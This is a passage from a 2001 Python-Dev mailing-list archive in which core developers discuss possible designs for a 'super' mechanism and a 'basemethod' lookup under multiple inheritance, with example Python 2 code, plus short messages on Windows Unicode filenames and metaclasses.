here (we've had a discussion about basemethod() some months or years ago). Tim ?
Note that there are many ways of defining what a basemethod is, due to the ambiguities that are caused by multiple inheritance (e.g. the same base class may appear in different branches of the inheritance tree). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 17:05:30 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:05:30 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:00:55 +0200." <000d01c0d310$4ee127d0$0900a8c0@spiff> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> Message-ID: <200105021505.KAA32231@cj20424-a.reston1.va.home.com> > guido wrote: > > > > class MyClass (BaseClass): > > > def foo (self, arg1, arg2): > > > super.foo(arg1, arg2) > > > > I'm sure that's everybody's favorite way to spell it! > > not mine. my brain contains far too much Python 1.5.2 code > for it to accept that some variables are dynamically scoped, > while others are lexically scoped. > > why not spell it out: > > self.__super__.foo(arg1, arg2) > > or > > self.super.foo(arg1, arg2) > > or > > super(self).foo(arg1, arg2) > > > Or, to relieve the burden from the symbol table, we could make super > > a keyword, at the cost of breaking existing code. > > hey, how about introducing $ as a keyword prefix for newly introduced > keywords? > > $super.foo(arg1, arg2) > > (this can of course be mapped to either of my previous suggestions; > "$foo" either means "self.foo" or "foo(self)"...)
> > and to save a little typing, only use it for keywords that start with > an "s" (should leave us plenty of expansion room): > > $uper.foo(arg1, arg2) > > otoh, if "super" is common enough to motivate introducing magic objects > into python, maybe "$" should mean "super."? > > $foo(arg1, arg2) > > and while we're at it, let's introduce "@" for "self.". > > gotta run -- time for my monthly reboot /F LOL! But you forgot the spelling of self.__super.foo(arg1, arg2) which would pass in the class name that's the other necessary input to a proper implementation of super. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 16:04:29 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:04:29 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> Message-ID: <3AF013ED.8A190FE2@lemburg.com> Here's an implementation of what I currently use to track down the basemethod (taken from mx.Tools):

    import sys, types

    _basemethod_cache = {}

    def basemethod(object,method=None,
                   cache=_basemethod_cache,InstanceType=types.InstanceType,
                   ClassType=types.ClassType,None=None):

        """ Return the unbound method that is defined *after* method in the
            inheritance order of object with the same name as method
            (usually called base method or overridden method).

            object can be an instance, class or bound method. method, if
            given, may be a bound or unbound method. If it is not given,
            object must be bound method.

            Note: Unbound methods must be called with an instance as first
            argument.

            The function uses a cache to speed up processing. Changes done
            to the class structure after the first hit will not be noticed
            by the function.

            XXX Rewrite in C to increase performance.

        """
        if method is None:
            method = object
            object = method.im_self
        defclass = method.im_class
        name = method.__name__
        if type(object) is InstanceType:
            objclass = object.__class__
        elif type(object) is ClassType:
            objclass = object
        else:
            objclass = object.im_class

        # Check cache
        cacheentry = (defclass, name)
        basemethod = cache.get(cacheentry, None)
        if basemethod is not None:
            if not issubclass(objclass, basemethod.im_class):
                if __debug__:
                    sys.stderr.write(
                        'basemethod(%s, %s): cached version (%s) mismatch: '
                        '%s !-> %s\n' % (object, method, basemethod,
                                         objclass, basemethod.im_class))
            else:
                return basemethod

        # Find defining class
        path = [objclass]
        while 1:
            if not path:
                raise AttributeError,method
            c = path[0]
            del path[0]
            if c.__bases__:
                # Prepend bases of the class
                path[0:0] = list(c.__bases__)
            if c is defclass:
                # Found (first occurrence of) defining class in inheritance
                # graph
                break

        # Scan rest of path for the next occurrence of a method with the
        # same name
        while 1:
            if not path:
                raise AttributeError,name
            c = path[0]
            basemethod = getattr(c, name, None)
            if basemethod is not None:
                # Found; store in cache and return
                cache[cacheentry] = basemethod
                return basemethod
            del path[0]
        raise AttributeError,'method %s' % name

-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 2 16:06:39 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:06:39 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
<200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> Message-ID: <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> /F: > guido wrote: > > > > class MyClass (BaseClass): > > > def foo (self, arg1, arg2): > > > super.foo(arg1, arg2) > > > > I'm sure that's everybody's favorite way to spell it! > > not mine. my brain contains far too much Python 1.5.2 code > for it to accept that some variables are dynamically scoped, > while others are lexically scoped. > > why not spell it out: > > self.__super__.foo(arg1, arg2) > > or > > self.super.foo(arg1, arg2) > > or > > super(self).foo(arg1, arg2) IMO we still need to specify the class, and there we are: super(self, MyClass).foo(arg1, arg2) Thomas From guido at digicool.com Wed May 2 17:11:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:11:17 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:02:41 +0200." <3AF01381.592AE31B@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> Message-ID: <200105021511.KAA32271@cj20424-a.reston1.va.home.com> > Guido van Rossum wrote: > > > > > This doesn't work in Python since Python has multiple inheritence, > > > e.g. super in > > > > > > class A(B,C): > > > def foo(self): > > > super.foo() > > > > > > is ambiguous. > > > > I'm not sure what you mean. The search is totally well-defined: first > > search B for a foo method, then search C. > > I thought you were talking about an abstract super class which is > how Java uses this term. Ah. I didn't realize. 
This would suggest that another (not yet mentioned) suggestion would be to spell the basemethod call as super.foo(self) keeping more in line with the tradition of passing self explicitly when calling basemethods. > Rereading some of the posts, I think you are indeed referring to > the method which foo overrides -- this is what I call basemethod > (since it is implemented in one of the base classes). Aha. > > > I'd rather suggest adding a function for finding the basemethod > > > of a method. This is probably the most common task in this context. > > > > I've never heard of the concept of basemethod, but if I may venture a > > guess, it would be the same definition as I give above. > > The basemethod can be defined as the first method of the same name > found in the inheritence tree using the standard Python lookup > strategy (left-right, depth first) when continuing the lookup search > at the node in the inheritence tree which defines the method querying > the basemethod. Yes, that's what I guessed. > In other words: you let Python continue the search for the method > as if it hadn't found the occurrance calling the basemethod() > API. Hmm, still not clear enough... better let Tim jump in here > (we've had a discussion about basemethod() some months or years > ago). Tim ? > > Note that there are many ways of defining what a basemethod > is, due to the ambiguities that are caused by multiple inheritence > (e.g. the same base class may appear in different branches of the > inheritence tree). Well, the search will find one definite method, but you're right that there may be situations where it's necessary to specify the specific base class! In C++ that is solved by writing B::foo() or C::foo(). Python doesn't have "::" and instead overloads the "." operator. Hmm, so even introducing super doesn't completely remove the need to be able to write C.foo to reference the unbound method foo of class C, and this may require that my ugly rule still be needed. 
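MAL's definition of a base method (resume the depth-first, left-to-right search just after the class that defines the calling method) can be pinned down in a few lines. This is a hedged sketch in modern Python 3: classic_order and find_basemethod are hypothetical names, and the search order imitates the classic one described above (Python 3's own MRO uses C3 linearization instead). Unlike the mx.Tools basemethod(), it takes the defining class explicitly rather than deriving it from a bound method.

```python
def classic_order(cls):
    """Depth-first, left-to-right list of cls and its bases (repeats kept)."""
    order = [cls]
    for base in cls.__bases__:
        order.extend(classic_order(base))
    return order


def find_basemethod(objclass, defclass, name):
    """Return the `name` that the one defined in `defclass` overrides.

    Walk the classic lookup order of `objclass` and resume the search
    just after the first occurrence of `defclass`.
    """
    order = classic_order(objclass)
    start = order.index(defclass) + 1   # ValueError if defclass is not a base
    for klass in order[start:]:
        if name in vars(klass):
            return vars(klass)[name]
    raise AttributeError(name)


class B:
    def foo(self):
        return "B.foo"

class C(B):
    def foo(self):
        return "C.foo"

class D(C):
    def foo(self):
        return "D.foo"


d = D()
print(find_basemethod(D, C, "foo")(d))   # B.foo
print(find_basemethod(D, D, "foo")(d))   # C.foo
```

Passing C as the defining class yields B.foo, the answer Guido expects in his test later in this thread; passing the instance's own class (D) yields C.foo, which matches what basemethod(self.foo) reports there.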
AFAIK, Smalltalk has only single inheritance, and so does Java, so there 'super' is enough. Will we need to add a "::" operator to Python??? --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 2 17:19:07 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:19:07 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:04:29 +0200." <3AF013ED.8A190FE2@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF013ED.8A190FE2@lemburg.com> Message-ID: <200105021519.KAA32312@cj20424-a.reston1.va.home.com> > Here's an implementation of what I currently use to track down > the basemethod (taken from mx.Tools): How am I supposed to use this? I tried this:

    class B:
        def foo(self):
            print "B.foo"

    class C(B):
        def foo(self):
            print "C.foo"
            B.foo(self)
            print basemethod(self.foo) # Expect this to be B.foo

    class D(C):
        def foo(self):
            print "D.foo"
            C.foo(self)

    d = D()
    d.foo()

but the call to basemethod(self.foo) in C prints C.foo, not B.foo as required. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 2 17:23:33 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:23:33 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 14:48:20 +1200." <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> References: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Message-ID: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> > > Except that sometimes you really do want x.__class__.__classdict__ to > > have priority (e.g. for "guarded" attributes).
> > What's a "guarded" attribute? I meant an attribute that's implemented by a pair of get and set functions. This is very useful; my proposed design lets you define this more directly rather than requiring you to override __getattr__ and __setattr__. > > But the issue of backwards compatibility is a big one here > > I was thinking that, while this is still in the __future__, > the __dict__ attribute would be a pseudo-dict that, by > default, behaves like the union of the old __dict__ and > the __classdict__. Actually, I think that what's in the __dict__ is just perfect; it's the definition of getattr(classobject, name) where name is both an instance and a class method that causes trouble. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 16:29:20 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:29:20 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF013ED.8A190FE2@lemburg.com> <200105021519.KAA32312@cj20424-a.reston1.va.home.com> Message-ID: <3AF019C0.716E6D35@lemburg.com> Guido van Rossum wrote: > > > Here's an implementation of what I currently use to track down > > the basemethod (taken from mx.Tools): > > How am I supposed to use this? > > I tried this: > > class B: > def foo(self): > print "B.foo" > > class C(B): > def foo(self): > print "C.foo" > B.foo(self) > print basemethod(self.foo) # Expect this to be B.foo This finds the basemethod of self.foo meaning the method overridden by D.foo. 
To get at the basemethod of C.foo, you'd have to call basemethod(self, C.foo) Note that the intent here is to be able to call basemethods even in case the defining class is only a mixin class -- a very common situation at least in many of my applications (keeps inheritance trees shallow and increases readability of the code). > class D(C): > def foo(self): > print "D.foo" > C.foo(self) > > d = D() > d.foo() > > but the call to basemethod(self.foo) in C prints C.foo, not B.foo as > required. > > --Guido van Rossum (home page: http://www.python.org/~guido/) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at effbot.org Wed May 2 16:15:58 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 16:15:58 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> Message-ID: <002c01c0d312$6a195110$e46940d5@hagrid> thomas wrote: > > why not spell it out: > > > > self.__super__.foo(arg1, arg2) > > > > or > > > > self.super.foo(arg1, arg2) > > > > or > > > > super(self).foo(arg1, arg2) > > IMO we still need to specify the class, and there we are: > > super(self, MyClass).foo(arg1, arg2) isn't that the same as self.__class__ ?
in which case super is something like:

    import new

    class super:
        def __init__(self, instance):
            self.instance = instance
        def __getattr__(self, name):
            for klass in self.instance.__class__.__bases__:
                member = getattr(klass, name, None)
                if member:
                    if callable(member):
                        return new.instancemethod(member, self.instance, klass)
                    return member
            raise AttributeError(name)

(I'm even more confused than my pythonware.com colleague) Cheers /F From donb at abinitio.com Wed May 2 16:41:14 2001 From: donb at abinitio.com (Donald Beaudry) Date: Wed, 02 May 2001 10:41:14 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <200105021441.KAA08444@localhost.localdomain> Guido van Rossum wrote, > [Greg Ward, welcome back!] > > * 'super' is a magic object that only makes sense inside a 'def' > > inside a 'class' (at least for now; perhaps it could be generalized > > to work at class scope as well as method scope, but let's keep > > it simple) > > Yes, that's about the only way it can be made to work. The compiler > will have to (1) detect that 'super' is a free variable, and (2) make > it a local and initialize it with the proper magic. Or, to relieve > the burden from the symbol table, we could make super a keyword, at > the cost of breaking existing code. I'm not at all sure I like the idea of 'super'. It's far more magic than I am used to (coming from Python at least). Currently, we spell 'super' like this:

    class foo(bar):
        def __repr__(self):
            return bar.__repr__(self) # that's super!

I like the explicit nature of it. As Guido points out however, this ends up being ambiguous when we try to make classes more "instance-like". Now, how do I like to spell super?
    class foo(bar):
        def __repr__(self):
            return bar._.__repr__(self) # now that's really super!

or, for those who like the "keyword":

    class foo(bar):
        def __repr__(self):
            super = bar._
            return super.__repr__(self)

The trick here is in the implementation of getattr on the '_'. It returns a proxy object for the class. When attributes are accessed through it, a different search path is taken. This path is the same path that would be taken by instance attribute lookup. In my code, I refer to this object as the 'unbound instance'. Since accessing a function through this object will yield an unbound instance method, the name makes sense to me. -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...So much code, so little time... From thomas.heller at ion-tof.com Wed May 2 16:49:02 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:49:02 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <075101c0d317$07516fe0$e000a8c0@thomasnotebook> > thomas wrote: > > > > why not spell it out: > > > > > > self.__super__.foo(arg1, arg2) > > > > > > or > > > > > > self.super.foo(arg1, arg2) > > > > > > or > > > > > > super(self).foo(arg1, arg2) > > > > IMO we still need to specify the class, and there we are: > > > > super(self, MyClass).foo(arg1, arg2) > > isn't that the same as self.__class__ ?
in which case > super is something like:
>
> import new
>
> class super:
>     def __init__(self, instance):
>         self.instance = instance
>     def __getattr__(self, name):
>         for klass in self.instance.__class__.__bases__:
>             member = getattr(klass, name, None)
>             if member:
>                 if callable(member):
>                     return new.instancemethod(member, self.instance, klass)
>                 return member
>         raise AttributeError(name)
>

No, it's not the same. Consider:

    class X:
        def test(self):
            print "test X"

    class Y(X):
        def test(self):
            print "test Y"
            super(self).test()

    class Z(Y):
        pass

    X().test()
    print
    Y().test()
    print
    Z().test()
    print

This prints:

    test X

    test Y
    test X

    test Y
    test Y
    (more test Y lines deleted)
    Runtime error: maximum recursion depth exceeded

This is because super(self).test for the Z() object should start the search in the X class, not in the Y class. Thomas From thomas.heller at ion-tof.com Wed May 2 16:53:17 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:53:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <078f01c0d317$9f6a5b70$e000a8c0@thomasnotebook> This implementation of super works correctly:

    import new

    class super:
        def __init__(self, instance, klass):
            self.instance = instance
            self.klass = klass
        def __getattr__(self, name):
            for klass in (self.klass,) + self.klass.__bases__:
                member = getattr(klass, name, None)
                if member:
                    if callable(member):
                        return new.instancemethod(member, self.instance, klass)
                    return member
            raise AttributeError(name)

    class X:
        def test(self):
            print "test X"

    class Y(X):
        def test(self):
            print "test Y"
            super(self, X).test()

    class Z(Y):
        pass

    X().test()
    print
    Y().test()
    print
    Z().test()
    print

Thomas From donb at abinitio.com Wed May 2 17:31:45 2001 From: donb at abinitio.com (Donald Beaudry) Date: Wed, 02 May 2001 11:31:45 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> <200105021511.KAA32271@cj20424-a.reston1.va.home.com> Message-ID: <200105021531.LAA08940@localhost.localdomain> Guido van Rossum wrote, > AFAIK, Smalltalk has only single inheritance, and so does Java, so > there 'super' is enough. Will we need to add a "::" operator to > Python??? Multiple inheritance introduces a potential wrinkle in my definition of the unbound instance. The problem is that the search starts one level too high. That is in:

    class foo(b1, b2):
        def __repr__(self):
            super = b1._ #this one
            super = b2._ #or this one?
            return super.__repr__(self)

we don't know which base class to choose as the starting point for the search. This problem already exists. Now, if we want to avoid it, this:

    class foo(b1, b2):
        def __repr__(self):
            super = foo.__super__
            return super.__repr__(self)

comes to mind. -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...Will hack for sushi...
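The recursion Thomas demonstrates goes away if the proxy is given the class whose method is running (not self.__class__) and resumes the search just after that class in the instance's own lookup order. A minimal sketch in modern Python 3 follows; Super is a hypothetical stand-in, and Python 3's built-in super(klass, instance) works on the same principle using the C3 MRO.

```python
class Super:
    """Hypothetical stand-in for the built-in super(klass, instance)."""

    def __init__(self, klass, instance):
        self.klass = klass
        self.instance = instance

    def __getattr__(self, name):
        # Search the instance's *actual* class order, but start just
        # after `klass`, the class whose method issued the call.
        mro = type(self.instance).__mro__
        for base in mro[mro.index(self.klass) + 1:]:
            if name in vars(base):
                attr = vars(base)[name]
                # Bind functions (and other descriptors) to the instance.
                if hasattr(attr, "__get__"):
                    return attr.__get__(self.instance, type(self.instance))
                return attr
        raise AttributeError(name)


class X:
    def test(self):
        return ["X"]

class Y(X):
    def test(self):
        # Pass Y, the defining class, never type(self).
        return ["Y"] + Super(Y, self).test()

class Z(Y):
    pass


print(Z().test())   # ['Y', 'X']: no runaway recursion for the subclass
```

Passing Y explicitly is the "other necessary input" Guido mentions; in Python 3 the zero-argument super() supplies it automatically.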
From donb at abinitio.com Wed May 2 17:37:39 2001 From: donb at abinitio.com (Donald Beaudry) Date: Wed, 02 May 2001 11:37:39 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <200105021537.LAA09063@localhost.localdomain> "Fredrik Lundh" wrote, > thomas wrote: > > > > why not spell it out: > > > > > > self.__super__.foo(arg1, arg2) > > > > > > or > > > > > > self.super.foo(arg1, arg2) > > > > > > or > > > > > > super(self).foo(arg1, arg2) > > > > IMO we still need to specify the class, and there we are: > > > > super(self, MyClass).foo(arg1, arg2) > > isn't that the same as self.__class__ ? in which case > super is something like: super is a lexically scoped concept. You can't ask the instance for it, since its value is different depending on the method in which it is needed. Just as:

    class foo(bar):
        def __repr__(self):
            return self.__class__.__repr__(self)

would get you into an infinite loop, while:

    class foo(bar):
        def __repr__(self):
            return bar.__repr__(self)

won't. Now, don't go thinking that

    class foo(bar):
        def __repr__(self):
            return self.__class__.__bases__[0].__repr__(self)

will do you any good either ;) Because it won't! -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...So much code, so little time... From guido at digicool.com Wed May 2 19:02:19 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 12:02:19 -0500 Subject: [Python-Dev] Unicode and the Windows file system. In-Reply-To: Your message of "Fri, 27 Apr 2001 00:26:39 +1000."
References: Message-ID: <200105021702.MAA01317@cj20424-a.reston1.va.home.com> > Now that 2.1 is out the door, how do we feel about getting these Unicode > changes in? > > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 No problem for me, although the context-sensitive semantics of the MBCS encoding still elude me. (Who cares, it's Windows. :-) Are you & MAL capable of sorting this out? Do you want me to add a +1 comment to the tracker? --Guido van Rossum (home page: http://www.python.org/~guido/) From gmcm at hypernet.com Wed May 2 18:01:20 2001 From: gmcm at hypernet.com (Gordon McMillan) Date: Wed, 2 May 2001 12:01:20 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> References: Your message of "Wed, 02 May 2001 14:48:20 +1200." <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Message-ID: <3AEFF710.9471.8025D7EA@localhost> Hmmm. Some time ago, Tim asked the question: "Why do you want this stuff?". As far as I can recall, he got 2 answers: "So I don't have to 'initialize(Klass)'" and "me, too". I don't think those qualify as answers. Some time ago (cf, types-sig brouhaha of a couple years ago) I concluded that the only purpose for this stuff was __getattr__ and __setattr__ hacks. I reached this conclusion by going nutzo using (Guido's) metaclass hook, and studying the available uses of ExtensionClass (I could find no public usage of Don's elegant madness). I rather liked Guido's "Turtles all the way down" (but his description was so cryptic that my interpretation may have been a hallucination), and I suspect he's still headed that way. Nonetheless, I would like to see this discussion of the elegance of Smalltalk's incompatible model (and how to fudge it in Python) balanced by some discussion of the expected pragmatic benefits. (That's a different topic from subclassing types.)
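One concrete pragmatic benefit, sketched here in modern Python 3 rather than the 2001 design: the "guarded" attribute Guido mentions elsewhere in this thread, an attribute backed by a get/set function pair, can be declared as a descriptor stored in the class __dict__ instead of being routed through __getattr__/__setattr__ hacks. Guarded, Account and balance are hypothetical names.

```python
class Guarded:
    """Data descriptor that routes attribute access through two functions."""

    def __init__(self, getter, setter):
        self.getter = getter
        self.setter = setter

    def __get__(self, instance, owner):
        if instance is None:        # accessed on the class: return descriptor
            return self
        return self.getter(instance)

    def __set__(self, instance, value):
        self.setter(instance, value)


class Account:
    def _get_balance(self):
        return self._balance

    def _set_balance(self, value):
        if value < 0:
            raise ValueError("balance cannot be negative")
        self._balance = value

    # The descriptor lives in Account.__dict__['balance'].
    balance = Guarded(_get_balance, _set_balance)

    def __init__(self, balance=0):
        self.balance = balance      # goes through _set_balance


acct = Account(10)
acct.balance = 25
print(acct.balance)                                  # 25
print(type(Account.__dict__["balance"]).__name__)    # Guarded
```

Only the one attribute pays for the indirection; every other attribute of Account keeps the ordinary lookup. The built-in property(fget, fset) packages the same pattern.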
start-with-"if-God-wanted-metaclasses-he-wouldn't-have- invented-proxies"--ly y'rs - Gordon From fredrik at effbot.org Wed May 2 17:47:08 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 17:47:08 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain> Message-ID: <00a901c0d31f$2797a370$e46940d5@hagrid> Donald Beaudry wrote: > super is a lexically scoped concept. You cant ask the instance for it > since it's value is different depending on in which it is needed oh, you want people to be able to inherit from classes using super? guess we'll have to use sys._getframe().f_back.f_method.im_class instead, then ;-) (any special reason why frame objects don't contain a pointer to the corresponding function/method object?) Cheers /F From mal at lemburg.com Wed May 2 18:11:50 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 18:11:50 +0200 Subject: [Python-Dev] Unicode and the Windows file system. References: <200105021702.MAA01317@cj20424-a.reston1.va.home.com> Message-ID: <3AF031C6.324D25D5@lemburg.com> Guido van Rossum wrote: > > > Now that 2.1 is out the door, how do we feel about getting these Unicode > > changes in? > > > > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 > > No problem for me, although the context-sensitive semantics of the > MBCS encoding still elude me. (Who cares, it's Windows. :-) > > Are you & MAL capable of sorting this out? Do you want me to add a +1 > comment to the tracker? 
I'll take care of the parser marker stuff and Mark can do the rest ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 19:17:50 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 12:17:50 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 17:47:08 +0200." <00a901c0d31f$2797a370$e46940d5@hagrid> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain> <00a901c0d31f$2797a370$e46940d5@hagrid> Message-ID: <200105021717.MAA01518@cj20424-a.reston1.va.home.com> > (any special reason why frame objects don't contain a > pointer to the 